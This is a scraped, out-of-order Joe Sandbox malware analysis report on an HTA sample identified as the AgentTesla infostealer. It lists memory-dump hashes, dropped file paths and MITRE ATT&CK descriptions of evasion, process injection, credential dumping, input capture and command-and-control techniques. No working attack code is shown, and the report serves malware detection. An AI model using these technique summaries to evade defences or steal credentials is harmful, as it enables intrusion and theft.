Source File: 0000000C.00000002.3340928459.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1160000_AddInProcess32.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 4fa141b91d7063e081e1a5d7317af40488c89f37fbc189a1c9e50b54f7ddb825
Instruction ID: 307dcd062ae2d794514daf4d9c2056795fe1178131a9a178bb107ef2011c5f4c
Opcode Fuzzy Hash: 4fa141b91d7063e081e1a5d7317af40488c89f37fbc189a1c9e50b54f7ddb825
Instruction Fuzzy Hash: 98214A7290025ACFDB04CF9AD844BEEBBF4BF49310F14845AE554A7241D778A944CF61

Function 0660C818 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0660C8A7

Memory Dump Source

Source File: 0000000C.00000002.3359942700.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6600000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: db5eb764906dbf78d88be24517d956fdca07f2925eace59541417ebbfce16fa9
Instruction ID: ed28c206956272897e8cf9b94bf82ed481a3a33665c7e9a7c394aa29cc72ce61
Opcode Fuzzy Hash: db5eb764906dbf78d88be24517d956fdca07f2925eace59541417ebbfce16fa9
Instruction Fuzzy Hash: 5121D4B5D00209DFDB10CF9AD584AEEBBF5FB48310F14851AE914A3350D374A950CFA5

Function 0660C820 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0660C8A7

Memory Dump Source

Source File: 0000000C.00000002.3359942700.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6600000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4af55e1e50d2032a4ad0b906c0325f92fe735abe2194e3922f42065d84979d5f
Instruction ID: 0a6efc850ac1f5495796b601288279dc6e587e971a36bd5439d3e654e2a7044a
Opcode Fuzzy Hash: 4af55e1e50d2032a4ad0b906c0325f92fe735abe2194e3922f42065d84979d5f
Instruction Fuzzy Hash: 1321B3B5900249EFDB10CF9AD984ADEBFF4FB48320F14841AE914A3350D375A954CFA5

Function 0111D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3340401658.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_111d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0e37089d66badeff4bf760c8f5d91f1bad767d2051d697a45db3f5f1f52c2a
Instruction ID: 4234f03e6949119c1f0278042c5c4252123a1fe75c27221ad8719a72993e91e5
Opcode Fuzzy Hash: 6d0e37089d66badeff4bf760c8f5d91f1bad767d2051d697a45db3f5f1f52c2a
Instruction Fuzzy Hash: D6210075604200EFDF19DF58E988B26FB61EB84314F20C5BDD90A0B25AC77AD446CA62

Function 0111D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3340401658.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_111d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: b21ce50cc460348312acac8960c0b64fe45b8017aba8a93cefad6420b341d926
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 4D11D075504280CFCB16CF54E5C4B15FF61FB44314F24C6A9D8094B65AC33BD44ACB62

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report seethebestthingswithgreatsituationshandletotheprogress.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\seethebestthingsentiretimewithgreatthingswithloverkiss[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RES4D39.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cdsohkt.0hm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yqxz5ix.u1u.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4h0kjita.4yz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kh2x5wpd.ccy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxcn21ql.1qb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_typn21qo.zuv.psm1

Windows Analysis Report
seethebestthingswithgreatsituationshandletotheprogress.hta

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre